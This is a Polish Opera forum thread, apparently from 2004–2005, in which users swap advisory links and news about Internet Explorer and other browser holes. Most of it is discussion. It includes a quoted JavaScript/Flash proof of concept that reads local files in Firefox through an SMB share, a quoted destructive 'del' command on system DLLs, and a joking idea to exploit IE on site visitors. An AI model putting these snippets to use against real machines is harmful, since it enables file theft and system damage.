czytałem w necie o firmach w których używanie IE jest surowo zabronione w regulaminie własnie że względów bezpieczeństwa; kłopot w tym że M$ potrafi dobrze sprzedać mit bezpiecznego IE a że to wielka bogata firma o dużych tradycjach to byłoby głupio im nie wierzyć, no i to ciągle aktualne przekonanie "przecież wszyscy używają IE"
Na strony "z panienkami" można trafić przypadkiem korzystając z wyszukiwarki.
Co do instalacji alternatywnych przeglądarek to wystarczą dobre chęci administratora. Nawet przy kilkudziesięiu komputerach można uporać się między śniadaniem a obiadem.
I szef będzie zadowolony, bo personel przejawia inicjatywę ku chwale firmy i się nie obija:)
Z Operą jest trochę fatygi, bo albo trzeba wykupić licencje i wpisywać numery seryjne, albo będzie wyświetlać reklamy i kablować o odwiedzanych stronach do Google, co jest trochę nieprofesjonalne.
Inną kwestią jest, że wielu informatyków kończyło owe studia wyłącznie dla przyszłej kasy, i guzik ich komputery obchodzą. Np. członek mojej dalszej rodziny nadzoruje sieć komputerową w pewnej dużej firmie ubezpieczeniowej, a pod koniec zeszłego roku ode mnie dowiedział się że coś takiego jak OpenOffice istnieje. Próbowałem go namówić na instalację Opery na jego domowym, antycznym komputerze, ale się nie dał. Nie miał czasu, bo czytał gazetę Rockową, a już jedną przeglądarkę ma, więc po co mu druga...
I tu jest właśnie pies pogrzebany. Sam jestem adminem sieci, wszyscy użyszkodnicy mają konta użytkowników i oczywiście, żeby coś zainstalować/uaktualnić, muszę wędrować po 40 komputerach, a to nie jest zbyt rozrywkowe zajęcie. Gdybym zresztą tylko tym się zajmował... Dlatego ja jak na zbawienie czekam, na takie narzędzia do zarządzania administracyjnego instalacjami z jednego kompa. Wiem, że Opera coś takiego chce/zamierza opracować.
Może OS powinna wydać swój produkt w postaci paczki .msi - dzięki temu łatwo instalowało by się Operkę (przynajmniej pod MS Windows).
Ktoś wie czy Firefoksa/Mozillę da się jakoś przyjemnie instalować przez sieć?
http://www.openoffice.org/screenshots/ooo11/writer/writer-it.png - czy wasza Opera też zalicza crasha po załadowaniu tego obrazka? Używam wersji 7.60p1.
BTW - trochę chyba felernie zrobiona galeria tego OłpenOfisa, bo działa chyba tylko przy "otwieraj wszystkie popupy"...
Nie zalicza. Opera 7.60p1 (Linux)daroc napisał(a)
http://www.openoffice.org/screenshots/ooo11/writer/writer-it.png - czy wasza Opera też zalicza crasha po załadowaniu tego obrazka? Używam wersji 7.60p1.
Originally posted by wyzimir
Może OS powinna wydać swój produkt w postaci paczki .msi - dzięki temu łatwo instalowało by się Operkę (przynajmniej pod MS Windows).
Ależ da się zrobić paczkę MSI! Niedawno komuś, kto odezwał się na tym forum się udało!
Tylko żeby jeszcze Opera Software oferowała do ściągnięcia.. Chyba nikt nie wpisał tego na Wishlist. Czy ktoś mógłby..?
Znowu IE Nic poważnego, ale zawsze...
http://secunia.com/advisories/12581/
Originally posted by lockoom
Znowu IE
http://secunia.com/advisories/12581/
Eee... jak dobrze czytam, to tym razem chodzi o KDE i Konquerora...
Originally posted by daroc
Eee... jak dobrze czytam, to tym razem chodzi o KDE i Konquerora...
Żle czytasz
Podobna dziura także występuje w Konquerorze, ale zgłoszona jest tu: http://secunia.com/advisories/12341/
Dam sobie rękę uciąć, że wcześniej na podanej przez ciebie stronie pisało Software: KDE 3.x, Konqueror 3.x i na dole były linki do patchów, które bynajmniej nie były paczami do IE...
Tutaj dłuzszy tekst o ostatnim pomyśle braku supportu dla IE w wersji non-XP...
... a tutaj [ot] o tym jak jedna z funkcji Win2000 o mało co nie skraszowała paru zamolotów...
tutaj jest po polsku http://www.cdrinfo.pl/newsy/archiwum/006868.php
ATTENTION: Rozmowa z szefem CERT Polska
W ten wtorek (dzisiaj), w godz. 12-14 gościem Forum idg.pl będzie Mirosław Maj, szef CERT Polska - zespołu powołanego do reagowania na zdarzenia naruszające bezpieczeństwo Internetu. Info hier:http://www.idg.pl/forum/topics.asp?ForumID=139
W związku z tym napisałem okolicznościowego posta ze stosownym pytaniem do tego Pana.
http://www.idg.pl/forum/thread.asp?ForumID=139&TopicID=8952
On może zmienić polski rynek przeglądarek jedną decyzją. Oby udało się go przekonać.
Proszę o doping w godzinach 12-14.
-> PM
Miło mi poinformować, że choć rozmowa była niezwykle trudna, końcowy efekt jest pozytywny!
Zachęcam do odwiedzenia i przeczytania tego wątku.
http://www.idg.pl/forum/thread.asp?ForumID=139&TopicID=8952
mimo to nie chwalmy dnia przed zachodem poczekajmy na postać i wnioski jakie popłyną z końcowego raportu bo przecież może być różnie, niemniej jeśli raport oprze się na faktach i tzw. góra nie oleje sprawy to kto wie...small step for human, big step for mankind
Originally posted by Mayor
mimo to nie chwalmy dnia przed zachodem
No, są tylko dwie wątpliwości - kiedy ukaże się ten raport i jak bardzo wyraźnie będzie niekorzystny dla IE.
Originally posted by Mayor
niemniej jeśli raport oprze się na faktach i tzw. góra nie oleje sprawy to kto wie...small step for human, big step for mankind
Bardzo trafnie to ująłeś.
Czas na dziury w jpeg. Sprawa jest o tyle poważna, że większość antywirusów nie skanuje jpegów. Będzi się działo...
[szerszy artykuł na ten temat w PCWorld]
Po pierwszych moich testach wnioskuję że nas to nie dotyczy w żaden sposób?
No to dziś bukiet ekstremalnie krytycznych błędów w MSIE: http://secunia.com/advisories/12806/ Na szczęście są łatki. Ekstremalnie zalecana instalacja patchy.
PS. Na miły dodatek kilka dziurek w samym Windows o krytycznym znaczeniu Przepraszam jaki to wczoraj mieliśmy dzień? Żyć nie umierać
http://secunia.com/advisories/12889/
Kolejne dwa bugi o statusie Highly critical w całkowicie połatanym IE i WinXP SP2
Hy hy. Oczywiście łat nie ma:Originally posted by lockoom
Kolejne dwa bugi o statusie Highly critical w całkowicie połatanym IE i WinXP SP2
Solution:
Disable Active Scripting or use another product.
Originally posted by oksza
Tutaj dłuzszy tekst o ostatnim pomyśle braku supportu dla IE w wersji non-XP...
No ładnie. Mi i co najmniej kilku osobom
wydawało się, że w tym artykule mowa jest o tym, że nie będą już wychodzić żadne łaty bezpieczeństwa na IE działające na systemach starszych niż WinXPSP2, tymczasem okazuje się, że chodzi tylko o rozszerzenia funkcjonalności - typu Security center i pop-up blocker, natomiast łaty nadal wychodzą. Dziwne, bo wydaje mi się, że gdzieś czytałem (raczej po angielsku), że przedstawiciel MS zachwalał, że "brak konieczności testowania łat na każdym systemie z osobna przyspieszy ich wydawanie". No nie było tak? Może edytowali ten artykuł..
Nowa luka w Internet Eksplorerze pozwala na przekierowanie użytkownika na
dowolną stronę bez jego wiedzy.
http://di.com.pl/n/?lp=8042&r=1
Franz twierdzi, że podany błąd występuje w każdej, załatanej przeglądarce Internet Eksplorer oraz w Outlook Expresie. Tym samym jest możliwość uruchomienia niebezpiecznej treści WWW rónież w podanym kliencie pocztowym.
wowPowyższym błędem zagrożone są wszystkie wersje przeglądarki internetowej IE aż do wersji 6.0.2800.1106 włącznie. Narażone są więc wszystkie osoby, które nie zainstalowały najnowszej wersji dodatku Service Pack2 dla Windows XP. Zagrożeni są również ci, którzy posiadają komputery klasy Apple i korzystają z przeglądarki Safari.
ani słowa o Operze jak zwykleUżytkownicy posiadający inne przeglądarki internetowe typu Firefox czy Mozilla na razie mogą spać spokojnie.
Ohoho, ależ bombowa publikacja roku
http://www.di.com.pl/n/?lp=8072
Secunia donosi o kolejnej poważnej i niezałatanej luce w "beczce prochu" zwanej Internet Explorerem. Luka umożliwia zdalnemu atakującemu przejęcie kontroli nad komputerem użytkownika odwiedzającego spreparowaną stronę WWW.
Zatem jeśli ktoś nadal się wacha w kwestii zmiany przeglądarki może czas wreszcie podjąć decyzję? Takie programy, jak Opera, Mozilla, czy K-Meleon nie tylko są bezpieczniejsze (luki w nich są odkrywane rzadziej i są szybciej łatane), ale - co przecież istotne - obsługują nowsze technologie wykorzystywane w budowie strony (dla przykładu IE nie w pełni obsługuje CSS2, z czym Opera i reszta konkurencji nie ma żadnego kłopotu).
Wspominają nawet o nowoczesnych technologiach! To nowość w prasie.
Tym razem jest o Operze, a o FF nie.
Błędy w IE wykrywane są tak często, że niektóre portale się gubią - Interia pisze jeszcze o tym poprzednim, a o tym chyba jeszcze nie napisała.
Zatem jeśli ktoś nadal się wacha
To też jest swoista nowość... w prasie.
edit Ale skoro w innym medium pojawiła się "metoda na głoda"...
editNie wiem, jak to u Was wygląda, ale w moim mniemaniu profesjonalizm artykułu stawia pod znakiem zapytania rzeczywiste zaawansowanie techniczne wspomnianych przeglądarek.
Ten wątek to chyba najlepsze miejsce na taką informację.
Rewelacyjny - nietypowy i śmieszny (ale jakże trafnie oddający rzeczywistość ) artykuł się dziś ukazał - "Drogi Internet Explorerze - odchodzę od Ciebie, zrywam" :
http://comment.zdnet.co.uk/other/0,39020682,39173930,00.htm
Originally posted by Nasty
"Drogi Internet Explorerze - odchodzę od Ciebie, zrywam"
Doskonały tekst.
Dwie nowe dziurki na koncie MSIE: http://secunia.com/advisories/13203/ oraz http://secunia.com/advisories/13208/
Używałeś MSIE? Nie jedź!
Ja chciałem zwrócić uwagnę na extramalnie kyrtyczną dziurę w MSIE: http://secunia.com/advisories/12959/ oraz skutki picia... MSIE: http://marcoos.jogger.pl/comment.php?eid=76479&startid=200411Pamiętaj! Używałeś MSIE? NIE JEDŹ!
PS. Tak przy okazji spojrzałem na status błędów w Gentoo (mojej ulubionej dystrybucji). 381 porad dotyczących wykrytych błedów i zero niezałatanych
Cudownie. A jak prosto się instaluje uaktualnienia. Wystarczy:emerge sync i potem emerge -Du world i po ptakach
http://di.com.pl/n/?lp=8312&r=1 - czy to jeszcze aktualne?
Originally posted by adas
http://di.com.pl/n/?lp=8312&r=1 - czy to jeszcze aktualne?
Niedawno wykryte: http://www.securityfocus.com/bid/11762. Jeszcze tydzień minął.
Błąd w Operze ?
Tu znajduje się informacja o możliwym błędzie w Operze: Link do strony Chip.pl. Jeśli już to ktoś podał wcześniej to przepraszam (nie zdążyłem poszukać bo Opera znowu zawiesiła komputer)Jestem tylko zwykłym użytkownikiem, który nie zna się na technologiach używanych przy pisaniu programów czy tworzeniu stron internetowych i dlatego nie jestem w stanie ocenić na ile tak informacja jest prawdziwa lub sensowna. Po prostu niechciałbym by okazało się, że w Operze są jakieś dziury . Nie po tym, jak zainstalowałem dzisiaj mojej głównej księgowej Operę 7.54 .
A to info znalazłem, gdy próbowałem ściągnąć misia 6.0 (nie byłem pewien, czy ksiegowa zgodzi się na inną przeglądarkę ale na szczęście rozczarowałem się pozytywnie).
Nie chciałem zakładac nowego tematu wiec wrzuciłem tutaj!!
Znaleziono lukę w zabezpieczeniach, która wystawia na niebezpieczeństwo użytkowników Internet Explorera, Mozilli, Firefoksa, Opery i Safari. Prowadzi ona do nieprzerwanego sortowania tablicy w JavaScripcie. Błąd nazwany Infinite Array Sort Denial Of Service Vulnerability pozwala na przeprowadzenie ataku DoS. Dotychczas nie natrafiono na przypadki skutecznego jego wykorzystania. Lukę odkrył Berend-Jan Wever, który zamieścił w sieci kod pozwalający wykorzystać znaleziony przez siebie błąd. Zamieszczenie kodu spotkało się z krytyką ze strony wielu osób zajmujących się bezpieczeństwem.
Żaden z producentów przeglądarek nie udostępnił jeszcze odpowiedniej łaty. [Źródło: chip.pl]
Przecież posty wyżej właśnie o tym traktują
Originally posted by Wojwit
Znaleziono lukę w zabezpieczeniach, która wystawia na niebezpieczeństwo użytkowników Internet Explorera, Mozilli, Firefoksa, Opery i Safari. Prowadzi ona do nieprzerwanego sortowania tablicy w JavaScripcie. Błąd nazwany Infinite Array Sort Denial Of Service Vulnerability (...)
No zaraz...... To wszystko jest bez sensu i chaotyczne:
- na securityfocus jest mowa tylko o Operze
- w Dzienniku Internautów jest napisane, że to dotyczy Opery i Safari (a w każdym razie na pewno nie IE - tytuł newsa "Nie tylko IE dziury spotykają"!!)
- teraz w CHIPie jest, że dotyczy to wszystkich przeglądarek
Mega kampania dez-informacyjna.
Fajne mamy te media. M.in. dlatego mało mnie obchodzi co w nich mówią... Szkoda, że miliony ludzi cierpią..
A na deser Interia na podstawie Dziennika Internautów stwierdziła, że "Mozilla też dziurawa" - pomijając Operę o której mowa była w materiale źródłowym, który praktycznie skopiowali. O IE nadal nie wiedzą.
Bosko!
Już nie wspomnę o tym, że odkrywanie dziur w innych produktach nie jest żadnym zaskoczeniem (choć tak brzmi ich wypowiedź) natomiast różnica polega na tym, że w now. przeglądarkach są odkrywane znacznie rzadziej, są zazwyczaj mniej poważne i są łatane wszystkie i szybko, natomiast IE nie dość że często są odkrywane poważne dziury, to są łatane z dużym opóźnieniem albo wcale - o czym powinni zawsze jasno napisać, żeby nie wywoływać wrażenia, że IE/O/M/FF to jedno i to samo - wszystkie tak samo dziurawe..
Originally posted by Nasty
[...] a w każdym razie na pewno nie IE - tytuł newsa "Nie tylko IE dziury spotykają"!!)[...]
Na pierwszy rzut oka mogłoby się tak wydawać, ale logicznie rzecz biorąc:
'nie tylko IE' = 'IE + inne'
Nie ma tu mowy o tym, że IE jest nie-dziurawy... ale fakt faktem, że takie jest pierwsze wrażenie czytającego tytuł.
A z podatnością na dziury, "faktem", że każdy program jest tak samo dziurawy, tylko nie wszystkie są tak dokładnie sprawdzane oraz z łataniem to już zupełnie inna bajka, której słuchając można reagować tylko na dwa sposoby:
albo (ewentualnie )...
Originally posted by daroc
Na pierwszy rzut oka mogłoby się tak wydawać, ale logicznie rzecz biorąc:
'nie tylko IE' = 'IE + inne'
Nie ma tu mowy o tym, że IE jest nie-dziurawy...
Właśnie, że jest:
"Niestety tym razem ta nieprzyjemna niespodzianka przydarzyła się przeglądarkom z rodziny Mozilli, Operze, a także Apple Safari."
Widzisz, żeby gdzieś powiedzieli, że jego ta luka też dotyczy?
Originally posted by daroc
A z podatnością na dziury, "faktem", że każdy program jest tak samo dziurawy, tylko nie wszystkie są tak dokładnie sprawdzane oraz z łataniem to już zupełnie inna bajka, której słuchając można reagować tylko na dwa sposoby:
Ano...
Ależ Panowie o czym wy tutaj dyskutujecie? Nie chcę się już powtarzać, bo białej gorączki dostaje na myśl o tej totalnej bzdurze. Nie wiem jak można nazywać zwykłego crash buga dziurą w zabezpieczeniach. Przecież takie crash bugi są odnajdujdywane nie tak znowu rzadko tu i tam i jakoś wielkiego halo z tego się nie robi. A tu masz afera na 14 fajerek o zwykłego crash buga
Ja Cię quiris doskonale rozumiem, że zrobią z igły widły - od czasu do czasu ktoś wypromuje jakiegoś crashera, nazywając go modnie i tajemniczo "atak typu Denial of service".
Ale nie dość, że nie mają zielonego pojęcia o czym piszą (mnie już to nie dziwi, tylko bardzo irytuje ), to jeszcze - rzecz już dość niecodzienna - każdy serwis pisze że w innych przeglądarkach to występuje, i to idąc od skrajności w skrajność - od "tylko Opera / nie tylko IE ma błędy hehe " do "błąd występuje we wszystkich przeglądarkach". I nawet nie potrafią przepisać jeden od drugiego bez błędów merytorycznych. Uczeń szkoły podstawowej by lepiej skopiował newsa z DI, niż zrobił to redaktor na Interii. A potem te głupoty czytają miliony ludzi. O co tu chodzi, w jakim świecie my żyjemy...
http://forum.infojama.pl/viewtopic.php?t=46645
Polecam przeczytac caly watek, a w szczegolnosci post niejakiego TomkOx'a - i zanim zdazylem to napisac, to juz zauwazylem, ze quiris sie zdazyl tam pojawic
A wszystko przez to, ze pare godzin spedzilem nad czyms innym...
Pozdrawiam,
janbar.)
Jak widzi wam się stwierdzenie
?Prowadzi ona do nieprzerwanego sortowania tablicy w JavaScripcie.
Trick polega na tym, że tablica celowo jest sortowana bez przerwy (pętla while), tak skonstruowany jest owy złośliwy skrypt.
Natomiast ww. cytat wskazuje, jakby jakaś luka powodowała - nie wiadomo z jakich przyczyn - nieprzerwane sortowanie tablicy...
KWIM? (Po prostu paranoja z tymi bugami ostatnio... wszyscy na siłę chcą wytknąć jakiejś przeglądarce lukę w zabezpieczeniach... )
Originally posted by daroc
Natomiast ww. cytat wskazuje, jakby jakaś luka powodowała - nie wiadomo z jakich przyczyn - nieprzerwane sortowanie tablicy...
No tak. Powinni wlepiać jakieś mandaty, żeby pohamować te absurdalne, krwiożercze zapędy. Bo ludzie to czytają i wierzą, że o - jest kolejna poważna luka, wszystkie przeglądarki są tak samo beznadziejne. Po prostu...
Dzisiaj dostalo sie IE i Firefoxowi.
IE. Website content spoofing. Moderately critical.
XPSP2 nie daje rady
http://secunia.com/advisories/13251/
Firefox. Website content spoofing rowniez. Moderately critical rowniez.
XPSP2 nie daje rady rowniez
http://secunia.com/advisories/13129/
Firefox. Website content spoofing rowniez. Moderately critical rowniez.
XPSP2 nie daje rady rowniez
http://secunia.com/advisories/13129/
FF 1.0 MooxM2 przechodzi test z popupblockerem. Bez występuje opisana przypadłość.
A co to jest MooxM2?
Originally posted by Jakub81
A co to jest MooxM2?
Jest to coś, czego zwykli użytkownicy będący grupą docelową Firefoksa nie używają, czyli specjalny build zoptymalizowany dla pewnej grupy procesorów.
Brazylijskiej telenoweli ciag dalszy. Mamy juz okragle 20 unpatched dla IE
http://secunia.com/advisories/13482/
Cross Site Scripting
Moderately critical
Re: Opera zalecana przez CERT Polska
Originally posted by orlik
W związku z nowymi lukami w Internet Explorer 6,które już funkcjionują i nie da się ich natychmiast naprawić - CERT Polska,zaleca stosowanie jako przeglądarki Opery.
http://www.cert.pl/index2.html?action=show_news_more&nid=574
A teraz ukazały się kolejne poprawki do poprawki SP2:D
http://www.cert.pl/index2.html?action=show_news_more&nid=628
Dodam ponownie,że wszyscy mający poprawkę SP2 mogą bezpłatnie przez 6 miesięcy używać i aktualizować jeden z najlepszych na świecie antywirusów - F-Secure Anti-Virus 2005.
SAMA POPRAWKA NIE WYSTARCZY !!!
Pobranie u dołu strony:
http://www.f-secure.com/poland/protectyourpc/
Gwóźdź do trumny - najnowszy extremalny-krytyczny bug w Internet Explorer! rotfl
nie chciałem nowego wątku zakłądać ale to jest piekne i mysle że sie nadaje, znalezione dzisiajExtremely Critical IE6/SP2 Exploit Found!
http://it.slashdot.org/article.pl?sid=05/01/09/0737248&from=rss
(...) Secunia says 'Solution: Use another product.'"
fajnie, kolejny bug do IE, tym razem super-duper grożny, można nim wyczyścic komuś twardziela albo w zasadzie zrobic cokolwiek
tu mają strone testową
http://secunia.com/internet_explorer_command_execution_vulnerability_test/
a tu jest fajnie napisane co mozna zrobić, polecam przeczytanie:
http://www.jmcardle.com/?postid=77
(..) This vulnerability is far worse however: it makes command lines run on the user's machine. Why is that bad? Because someone can make that command be "del C:\Windows\System32\*.dll" or something equally sensitive, causing Windows to crash... permanently. The solution? Switch browsers; stop using Internet Explorer.
(...) This is by far the worst security hole I've ever seen.
PS. a może tak akcja, każdy webmajster niech wykorzysta buga do zrobienia numeru każdemu IE user wchodzacemu na stronę, np.
- zmienić mu tapetke na taką z wielki czerwonym O
- założyć foldery o nazwach "hej to ja IE zrobilem! Zmien mnie!"
- jakies propagandowe treści na pulpicie i w plikach
oczywiście żartuje, byłaby to akcja poniżej pasa pokroju "begin 7"
niemniej ciekawym czy M$ się przejmie i wypuści jakąś łate, gdyby rozeszła się szeroko wieść że IE powoduje jakieś numery w systemie to oczekiwałbym masowego pójścia po rozum do głowy i zmian przeglądarek, tak samo jak masowo ludzie ściągali antywiry i szczepionki na blastery kiedy ludziom nagle zaczęły restartować się kompy
PPS. bug działa na WinXP SP2 więc posiadacze Win2k i Win98/ME nawet nie macie co klikać czy się odpali bo ponoć nie działa wstecz
To ja sie doloze z innej beczki...
http://secunia.com/secunia_research/2004-15/advisory/
http://www.securityfocus.com/archive/1/386070/2005-01-04/2005-01-10/0
Pozdrawiam,
janbar.)
Wypijmy za błędyyyyyyyyyyy
za błędy w Explorerzeeeeeeeeeeee
niech wyjdą na dobreeeeeeeeeee
naszej Operzeeee
Mayor, jeżeli kiedyś się spotkamy, to masz u mnie browara (a niech mi tam, dwa browary ) za tę jakże cudowną wiadomość
A ja za to prosze, ktoregos z moderatorow o dolaczenie tego watku, do znanego nam wszystkim o tytule "Wirusy promujace Opere.." - tam jest jego miejsce....
Bardzo dziekuje...
Pozdrawiam,
janbar.)
Hmmm.... to jest zbyt piękne, żeby mogło zginąć między miliardem innych doniesień o błędach w IE...
Extremely critical jest tam mnostwo toze, i podanych zalecen o zmianie przegladarki na inna, wiec jak najbardzie zasadne jest umieszczenie wlasnie tam niniejszego watku. Nie czytales tamtego watku kolego.
Pozdrawiam,
janbar.)
Re: Gwóźdź do trumny - najnowszy extremalny-krytyczny bug w Internet Explorer! rotfl
Originally posted by Mayor
PS. a może tak akcja, każdy webmajster niech wykorzysta buga do zrobienia numeru każdemu IE user wchodzacemu na stronę, np.
- zmienić mu tapetke na taką z wielki czerwonym O
- założyć foldery o nazwach "hej to ja IE zrobilem! Zmien mnie!"
- jakies propagandowe treści na pulpicie i w plikach
oczywiście żartuje, byłaby to akcja poniżej pasa
Można zmienić Twój pomysł tak, by nie był poniżej pasa. Wystarczy umieścić na stronie informacje typu "Sprawdź czy twoja przeglądarka jest bezpieczna" i zapytać użytkownika czy zgadza się na przeprowadzenie testu polegającego na... (i tutaj wymienić, podając szczegółowe informacje, co robi test).
Gdyby ktoś przygotował coś podobnego (mrugam do browsehappy.pl) - chętnie umieściłbym to na kilku stronach.
Re: Re: Gwóźdź do trumny - najnowszy extremalny-krytyczny bug w Internet Explorer! rotfl
po kliknięciu użytkownik IE na WinXP SP2 ujrzałby na pulpicie tapetę z napisemOriginally posted by zwierz
Można zmienić Twój pomysł tak, by nie był poniżej pasa. Wystarczy umieścić na stronie informacje typu "Sprawdź czy twoja przeglądarka jest bezpieczna" i zapytać użytkownika czy zgadza się na przeprowadzenie testu polegającego na... (i tutaj wymienić, podając szczegółowe informacje, co robi test).
"Twoja przeglądarka nie jest tak bezpieczna jak sądziłeś. Ale są inne, lepsze [tu lista]." a na pulpicie leżałaby już ikonka zainstalowanej opery
btw. ciekawy ten bug skoro działa tylko na XPku z pełnym drugim service packiem a na pierwszym nie (u mnie bug nie działa), to by znaczyło że nawet microsoftowe łaty otwierają tyle ciekawych furtek w ich oprogramowaniu...
ja mam WinXP i SP1 ale w miarę na bieżąco instalowane łaty z windows update dlatego napisałem sobie w sigu SP2; widocznie pełny SP2 oprócz standardowych łat i tego że nie działa na nich sporo gier które działały wcześniej, jeszcze coś dodatkowo miesza
co do akcji poniżej pasa wycelowanych w IE to ja osobiście nie mam nic przeciwko ale wiem że gro tzw. poważnych nigdy czegos takiego nie przebonuje na szerszą skale (vide negatywny oddźwięk kampanii "powiedz nIE")
Pfiuuu, na moim IE nie działa ten błąd. Chwilę przed przeczytaniem tego postu windows update dociągnął mi jakąś łatkę... czyżby tym razem szybka reakcja?
bazyli, to działa tylko z WinXP SP2.
no tak, moja stopka jest nieco myląca, ale teraz siedzę przy innym kompie, właśnie na WinXP SP2 :-)
Rzeczywiście, wczoraj MS wypuścił łatę, która częściowo (tylko to co wykryto ostatnio) załatała dziurę.
Ktoś wyciął post związany z tematem wątku a dotyczący dziur w innych przeglądarkach. [...]
http://my.opera.com/forums/showthread.php?s=&threadid=76962&perpage=10&pagenumber=11#post803842 i ta sama prośba co w innym wątku.Ktoś wyciął post związany z tematem wątku a dotyczący dziur w innych przeglądarkach.
i ta sama prośba co w innym wątku.
Ponawiam swoje pytanie jak w innym wątku.
Odpowiedź udzielona w innym wątku.Originally posted by lazik_s
Ponawiam swoje pytanie jak w innym wątku.
No ja dzis znalazłem taki kwiatek:(
Na ShmooCon 2005 (hakerski zlot) zaprezentowano działanie metody fałszującej adresy w wielu popularnych przeglądarkach - z wyjątkiem Internet Explorer. Problem związany jest z obsługą łączy formatu IDN (International Domain Name). Innymi słowy: można trafić na "stronę" która posiadać będzie normalnie wyglądające i normalnie zachowujące się linki, jednak przenosić będzie nie tam gdzie użytkownik miał to w zamierzeniu. Problem obejmuje wszystkie przeglądarki Mozilla-like, Opera, w tym także wszystkie przeglądarki dla MacOS (w tym także Safari) oprócz Internet Explorera dla Mac i Windows. Internet Explorer również może tak zachowywać się po zainstalowaniu plug-inu obsługi IDN.
Jednym ze sposobów na sprawdzenie poprawności "trafienia" na daną witrynę w sieci jest skopiowanie (zaraz po wejściu na witrynę, np. bankową) adresu z paska adresu i wklejenia go do okna Terminala (lub edytora czystego, nieformatowanego tekstu) - jeśli adres będzie zapisany w IDN, czyli z widocznymi krzaczkami ( #cyfry; ) - oznacza to że lokacja jest newłaściwa - innymi słowy zafałszowana... Również poprzez podgląd źródła strony można zbadać jak "kodowane" są odnośniki url.
Roziwązanie problemu pociągnie do działań wielu developerów przeglądarek na silniku gecko/khtml.
Szczegółowe źródło ShmooCon: http://www.shmoo.com/idn/
Originally posted by Wojwit
No ja dzis znalazłem taki kwiatek:(
Hmm: http://my.opera.com/forums/showthread.php?s=&threadid=80983
quiris napisał(a)
Hmm: http://my.opera.com/forums/showthread.php?s=&threadid=80983
Eee to do skasowania bo nie zauważyłem:insane:
Re: Gwóźdź do trumny - najnowszy extremalny-krytyczny bug w Internet Explorer! rotfl
Originally posted by Mayor
PPS. bug działa na WinXP SP2 więc posiadacze Win2k i Win98/ME nawet nie macie co klikać czy się odpali bo ponoć nie działa wstecz
Spełniają się moje proroctwa... Stare windowsy stają się bezpieczniejsze od nowych. Zostanę przy 98TE
Na razie (odpukać) nikt mi kuku nie zrobił, żadnego wirusa ani szpiega nie miałem jeszcze...
Nie dotyczy to IE, ale FF , ale mimo to wstawie -
http://www.securityfocus.com/bid/12533
http://www.securityfocus.com/archive/1/390284
POzdrawiam,
janbar.)
Originally posted by janbar
Nie dotyczy to IE, ale FF , ale mimo to wstawie -
http://www.securityfocus.com/bid/12533
http://www.securityfocus.com/archive/1/390284
Dziś Security Focus cały dzień leży jak widzę. Co to za problem, poważny?
Juz dziala, a z drugiego linka:
I took a quick 5 minute look at this, and it looks like you can read
arbitrary files with this without requiring any kind of user interaction.
Just create a file called whatever.html on a windows SMB share with this
content
--snip--
<script language="javascript">
var oXML=new XMLHttpRequest();
oXML.open("GET","file:///C:/jelmer.txt",false);
oXML.send(null);
alert(oXML.responseText);
</script>
--snip--
Now create a flash file that opens file://///SOME_IP/SHARENAME/whatever.html
(I just created an empty flash file with a single action that contained
the following line of actionscript : getURL
("file://///SOME_IP/SHARENAME/whatever.html", "_self"); )
and presto it will display the contents of c:\jelmer.txt
Pozdrawiam,
janbar.
)
No to jeszcze jeden do kolekcji...
http://www.securityfocus.com/archive/1/390784
Another major vulnerability has been found in Microsoft's Internet Explorer and Outlook
Express. The flaw is in the way that these applications can be manipulated
in simple HTML code to display an URL other than the one specified in a link, to
be displayed in the status bar.
Pozdrawiam,
janbar.
)
parampam pam, coś cicho tu ostatnio
http://newsroom.chip.pl/news_133314.html
No to ja tez jeszcze "podglosnie"...
http://newsroom.chip.pl/news_140500.html
"Microsoft bada doniesienia o luce w Internet Explorerze, która wystawia maszyny wykorzystujące przeglądarkę z Redmond na poważne niebezpieczeństwo. O dziurze jako pierwszy poinformował przedstawiciel French Security Incident Response Team (FrSIRT), oceniając ją jako krytyczną.
Zdaniem FrSIRT lukę można wykorzystać, przygotowując specjalnie spreparowaną stronę WWW i zachęcając internautę do jej odwiedzenia. Przestępca może przejąć kontrolę nad pecetem lub zainstalować na nim szkodliwe oprogramowanie. Francuzi twierdzą, że w Sieci krąży już kod pozwalający na przeprowadzenie skutecznego ataku.
Przedstawicielka Microsoftu podała, że jej koncern bada doniesienia o dziurze. Zaznaczyła przy tym, że do tej pory nie ma żadnych informacji o tym, by jej istnienie zostało przez kogoś wykorzystane.
Firma Websense, zajmująca się monitorowaniem Internetu pod kątem bezpieczeństwa, informuje, że nie odkryto jeszcze żadnej witryny, która wykorzystywałaby wspomnianą lukę.
Nie jest jeszcze jasne, które komputery narażone są na niebezpieczeństwo. Na razie wiadomo, że do wykorzystania luki konieczne jest, by w atakowanym komputerze istniał plik msdds.dll. FrSIRT bada, jak bardzo rozpowszechniona jest ta biblioteka. Wydaje się, że jest ona instalowana wraz z deweloperskimi narzędziami Visual Studio, możliwe jednak, że pojawia się też w bardziej popularnych programach.
Microsoft informuje, że jest ona instalowana z Visual Studio, ale na naszych laboratoryjnych maszynach nie mamy tego oprogramowania - poinformował przedstawiciel FrSIRT. Na razie potwierdzono istnienie luki w systemie Windows XP SP2 z IE6 ze wszystkimi dostępnymi łatami."
Eksploit: http://www.frsirt.com/exploits/20050817.IE-Msddsdll-0day.php
Pozdrawiam,
janbar.)
http://my.opera.com/polski/forums/topic.dml?id=110149 - ten problem z trojanami/spyware powodującymi cykliczne otwieranie się co parę minut domyślnej przeglądarki to obecnie masowa plaga wśród użytkowników wiodącej (ale tylko w popularności) przeglądarki.